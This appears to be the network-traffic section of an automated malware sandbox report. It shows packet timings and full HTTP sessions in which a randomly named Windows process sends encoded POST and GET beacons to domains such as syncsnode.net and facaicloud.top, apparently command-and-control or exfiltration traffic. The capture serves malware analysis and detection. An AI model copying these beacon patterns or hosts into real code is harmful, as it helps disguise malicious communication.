                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.001413107 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.001580000 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.653997898 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.655610085 CEST8050012162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.655682087 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:11.507091999 CEST5001280192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.525270939 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.530702114 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.530777931 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.537889957 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.543003082 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.124404907 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.124540091 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.124797106 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.126990080 CEST5001380192.168.2.5162.0.225.218
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.132312059 CEST8050013162.0.225.218192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.252152920 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.257127047 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.257204056 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.270160913 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.275842905 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.130822897 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.131222963 CEST8050014103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.131315947 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.772351980 CEST5001480192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.825586081 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.830825090 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.831470966 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.914417982 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.919430017 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:21.725495100 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:21.725625038 CEST8050015103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:21.725812912 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:22.428519011 CEST5001580192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.486490965 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.491470098 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.491564989 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.558125973 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.563119888 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.563205957 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:24.405448914 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:24.406253099 CEST8050016103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:24.406502008 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:25.100519896 CEST5001680192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.271992922 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.277087927 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.283235073 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.333060026 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.338330030 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797785997 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797815084 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797837019 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797965050 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798520088 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798537970 CEST8050017103.249.106.91192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.798572063 CEST5001780192.168.2.5103.249.106.91
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49958 | 154.23.184.95 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:09:26.181927919 CEST | 550 | OUT | GET /0fcg/?KteDo=fX0Hm8kxa&BHNhDJjp=hJPFsW9wVXXSmVQNX9HyPUqpnWaGwoAwUQqBAOekg/iA3H1k+2o0va3fZiXrpa/qEBgAqlFBPzvmzQvG7thcdV/HiwU/gazVS6QU6A3e7YzcCqqFBxHno6Fx/WWCMuQjEQ== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.wcr5.top
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:09:27.764803886 CEST | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Oct 2024 13:09:26 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66a87b7e-94"
Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49986 | 172.67.218.106 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:09:42.887197971 CEST | 813 | OUT | POST /t97r/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.syncsnode.net
Origin: http://www.syncsnode.net
Referer: http://www.syncsnode.net/t97r/
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Raw: 42 48 4e 68 44 4a 6a 70 3d 53 57 53 63 79 41 44 42 63 4c 44 5a 64 36 65 66 2b 47 69 2f 43 4f 58 73 38 70 6c 4c 4a 44 50 48 33 35 34 4c 74 36 49 74 51 4f 34 66 69 49 30 6a 43 68 30 6f 4c 48 6c 38 4e 56 43 68 5a 6b 30 73 44 41 73 70 4d 32 62 43 48 6d 72 59 69 6f 67 72 6c 76 68 45 4a 73 44 50 51 66 56 51 52 54 4d 4d 71 4a 44 45 6c 48 4b 78 72 77 41 47 2b 52 71 41 6d 6c 6a 37 51 47 70 66 73 33 4d 79 59 66 67 4d 4e 59 56 49 63 4e 57 56 31 4e 34 30 37 72 57 6a 6b 44 6f 49 63 2f 49 55 49 39 66 6f 66 32 59 36 2f 37 62 33 71 36 6b 59 47 36 36 5a 68 43 4d 32 42 67 39 4f 33 6d 4b 6d 68 56 31 52 5a 58 53 31 68 4c 35 71 52 4b 77 3d
Data Ascii: BHNhDJjp=SWScyADBcLDZd6ef+Gi/COXs8plLJDPH354Lt6ItQO4fiI0jCh0oLHl8NVChZk0sDAspM2bCHmrYiogrlvhEJsDPQfVQRTMMqJDElHKxrwAG+RqAmlj7QGpfs3MyYfgMNYVIcNWV1N407rWjkDoIc/IUI9fof2Y6/7b3q6kYG66ZhCM2Bg9O3mKmhV1RZXS1hL5qRKw=
Oct 11, 2024 15:09:43.699394941 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:09:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkU0Iri%2FA2obOuL5Skx9aOk9wBsAH1jtOvgEAIjBWi7soU%2Fi%2BtlRT7NaQZ1CnwJWBUau9QgIDCljZeAtRLZCvSzkQmOtig76YHjToEeax4klazQzyNwseG6ssIRVyPw0nki0Xg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d0f1611b9478c7d-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
Oct 11, 2024 15:09:43.699641943 CEST | 213 | IN | Data Raw: 13 ef f2 f5 32 37 c5 ee 7d dd d1 29 0d 4a 48 9a 2b c8 17 c5 fc a2 b4 dd ed d6 f0 b4 e4 9b db f7 a0 6d 40 5e aa b0 f3 ed 9d a7 a3 34 67 70 34 a3 47 09 dd 19 a0 11 af 71 89 55 0b ca e3 b0 4f 14 b3 ab b2 6c 9e e7 8d d1 8c c1 21 4a c6 5e 6d 7a 3a 64
Data Ascii: 27})JH+m@^4gp4GqUOl!J^mz:d=f_;vmaDr%O?Wc+`vN3+ cD]'4v70uB.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49987 | 172.67.218.106 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:09:45.433125973 CEST | 833 | OUT | POST /t97r/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.syncsnode.net
Origin: http://www.syncsnode.net
Referer: http://www.syncsnode.net/t97r/
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Raw: 42 48 4e 68 44 4a 6a 70 3d 53 57 53 63 79 41 44 42 63 4c 44 5a 63 62 75 66 79 42 2b 2f 45 75 58 76 79 4a 6c 4c 44 6a 4f 76 33 35 38 4c 74 2b 77 62 54 38 4d 66 68 71 38 6a 46 54 63 6f 49 48 6c 38 47 31 43 6f 64 6b 30 37 44 41 6f 4c 4d 33 6e 43 48 6d 2f 59 69 70 51 72 6c 63 4a 48 4b 63 44 4e 63 2f 56 57 65 7a 4d 4d 71 4a 44 45 6c 48 65 62 72 77 49 47 2b 68 61 41 6b 45 6a 34 54 47 70 63 6c 58 4d 79 4a 50 67 49 4e 59 56 36 63 49 32 7a 31 50 77 30 37 72 47 6a 6b 79 6f 4c 53 50 4a 66 57 4e 65 67 62 55 52 51 35 4c 62 43 76 74 56 38 58 70 4b 51 70 55 68 63 62 43 31 6d 6b 47 6d 65 78 47 39 6d 49 6e 7a 63 37 6f 70 61 50 64 6c 34 65 73 66 59 32 7a 36 64 55 75 53 33 30 4d 4b 32 44 51 76 71
Data Ascii: BHNhDJjp=SWScyADBcLDZcbufyB+/EuXvyJlLDjOv358Lt+wbT8Mfhq8jFTcoIHl8G1Codk07DAoLM3nCHm/YipQrlcJHKcDNc/VWezMMqJDElHebrwIG+haAkEj4TGpclXMyJPgINYV6cI2z1Pw07rGjkyoLSPJfWNegbURQ5LbCvtV8XpKQpUhcbC1mkGmexG9mInzc7opaPdl4esfY2z6dUuS30MK2DQvq
Oct 11, 2024 15:09:46.252962112 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:09:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhcv0QSTuFkwz8VSce9PuNag8PzZG09W8PLiPGo2ELJ9BaqMNGec36dDVkH3WaXfMqYwzwhoKK68CvkXx5lOJMSEnt3feDXexfWyR09uIqZoyOVgYqM%2BRQEhPCjiofGJYnl3zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d0f16219ca02394-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
Oct 11, 2024 15:09:46.253051996 CEST | 214 | IN | Data Raw: 32 37 c5 ee 7d dd d1 29 0d 4a 48 9a 2b c8 17 c5 fc a2 b4 dd ed d6 f0 b4 e4 9b db f7 a0 6d 40 5e aa b0 f3 ed 9d a7 a3 34 67 70 34 a3 47 09 dd 19 a0 11 af 71 89 55 0b ca e3 b0 4f 14 b3 ab b2 6c 9e e7 8d d1 8c c1 21 4a c6 5e 6d 7a 3a 64 e8 3d f9 d4
Data Ascii: 27})JH+m@^4gp4GqUOl!J^mz:d=f_;vmaDr%O?Wc+`vN3+ cD]'4v70uBb.0


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49988 | Destination IP: 172.67.218.106 | Destination Port: 80 | PID: 3224
Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:09:47.976398945 CEST | 1850 | OUT | POST /t97r/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.syncsnode.net
Origin: http://www.syncsnode.net
Referer: http://www.syncsnode.net/t97r/
Content-Length: 1245
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:09:48.782198906 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:09:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANaOv9XQTsyoFef80Srr98h8tnv5IEidnHrfJyXerFhjMAMr%2BGjWYXCuW2tcmwHSVVBFU2Hp%2B%2FXt60%2FjLOBmjae7J55Nx6c4yybP6iZAo%2BHl4MfOAZlnsG6VtaHQkvzdPD%2FSmw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d0f16317e2b0cc0-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49989 | Destination IP: 172.67.218.106 | Destination Port: 80 | PID: 3224
Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:09:50.579787016 CEST | 555 | OUT | GET /t97r/?BHNhDJjp=fU68x3PRULyXXLX18Be8OZjG7cRSBQSavMkIge0xVdkIxqx/cDskQThzDXmmTxAsHWtrBQPcDxz3o7UBkP1yUbLOTohuYgETqqTp8AigyDVY+hGioDWRRBsptVM6QvNfSQ==&KteDo=fX0Hm8kxa HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.syncsnode.net
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:09:51.371690989 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:09:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lal2CfZ5zm7NZgWlogiN555ysaYl6I77Px0eouK%2FlNhXpDJfybchTpxGH6c0s72ZcnH2fYn%2Bnq6LvptKDzJar2WBaiFqSc6GB3DUxZoVT4YdBY%2FN3xYfeg%2FOOT4Iv0H%2BJCS3yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8d0f1641c94318bc-EWR
alt-svc: h3=":443"; ma=86400
Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; f
Oct 11, 2024 15:09:51.371757984 CEST | 754 | IN |
Data Ascii: ont-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49990 | Destination IP: 74.48.31.123 | Destination Port: 80 | PID: 3224
Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:09:56.893328905 CEST | 816 | OUT | POST /fxh3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.facaicloud.top
Origin: http://www.facaicloud.top
Referer: http://www.facaicloud.top/fxh3/
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=ee1j2U7tBqsPqxhLXxdcwlP5PHuOve18bJIWX1caakkJ/20neMjFwS7/Mf2zmTf/Qb/NBZKe2A3BYlZey5X7mPW8jRTqYtlA8StMf57/arLQeT2n6WSTcZEQINTAJVF/cgfo4Nww5cAXEn93FtADfZ54zsrVf8XBU/yZLl5S3ZmKJ3D17smlfrN7VrvOdAlCFe90GSw=
Oct 11, 2024 15:09:57.535053015 CEST | 858 | IN | HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache, private
date: Fri, 11 Oct 2024 13:09:57 GMT
Content-Encoding: gzip


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49991 | Destination IP: 74.48.31.123 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp: Oct 11, 2024 15:09:59.436171055 CEST | Bytes transferred: 836 | Direction: OUT | Data:
POST /fxh3/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.facaicloud.top
                                                                                                                                                                                                                                    Origin: http://www.facaicloud.top
                                                                                                                                                                                                                                    Referer: http://www.facaicloud.top/fxh3/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
